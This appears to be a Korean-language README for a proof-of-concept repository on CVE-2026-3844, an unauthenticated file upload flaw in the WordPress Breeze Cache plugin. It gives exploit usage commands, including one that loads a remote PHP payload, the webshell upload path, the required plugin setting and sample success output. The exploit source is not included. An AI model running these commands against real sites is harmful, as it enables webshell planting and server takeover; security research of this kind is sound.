
# CVE-2026-3844에 대한 Python 개념 증명 코드 WordPress Breeze Cache 플러그인의 인증되지 않은 임의 파일 업로드 취약점으로, 원격 코드 실행을 가능하게 합니다. 탐지, 악용, 웹셸 검증 기능을 포함합니다.
이 저장소는 WordPress Breeze Cache 플러그인 <= 2.4.4에 영향을 미치는 인증되지 않은 임의 파일 업로드(Unauthenticated Arbitrary File Upload) 취약점을 시연하기 위한 Python 개념 증명(PoC) 스크립트를 포함합니다.
⚠️ 이 프로젝트는 승인된 보안 테스트, 교육적 연구, 방어적 검증 목적으로만 엄격히 사용됩니다.
이 취약점은 Breeze Cache의 gravatar 캐싱 기능을 악용하여 공격자가 제어하는 파일을 WordPress 캐시 디렉터리에 저장합니다.
pycurltermcolor의존성 설치:
pip install pycurl termcolor
| 파일 | 설명 |
|---|---|
CVE-2026-3844.py | 메인 PoC 악용 스크립트 |
CVE-2026-3844.yaml | YAML 템플릿/구성 |
python3 CVE-2026-3844.py -u http://target.com --check-only
python3 CVE-2026-3844.py -u http://target.com
python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php
python3 CVE-2026-3844.py -u http://target.com -o results.txt
스크립트는 다음 단계를 수행합니다:
업로드된 페이로드는 다음 경로에서 접근 가능할 수 있습니다:
/wp-content/cache/breeze-extra/gravatars/
성공적인 악용은 다음 Breeze 설정이 활성화되어 있어야 할 수 있습니다:
Host Files Locally - Gravatars
이 기능이 비활성화된 경우 악용 시도가 실패할 수 있습니다.
[+] Target VULNERABLE (Breeze v2.4.4)
[+] Comment posted successfully
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!
이 저장소는 다음을 위해 제공됩니다:
소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에 이 프로젝트를 사용하지 마십시오.
저자는 이 프로젝트로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.
웹사이트 관리자는 다음을 수행해야 합니다:
/wp-content/cache/에서 의심스러운 파일 모니터링이 개념 증명은 다음을 돕기 위해 제작되었습니다:
안전하지 않은 캐싱 메커니즘과 임의 파일 업로드와 관련된 보안 위험을 이해하도록 돕기 위함입니다.
보안 연구 / 교육 프로젝트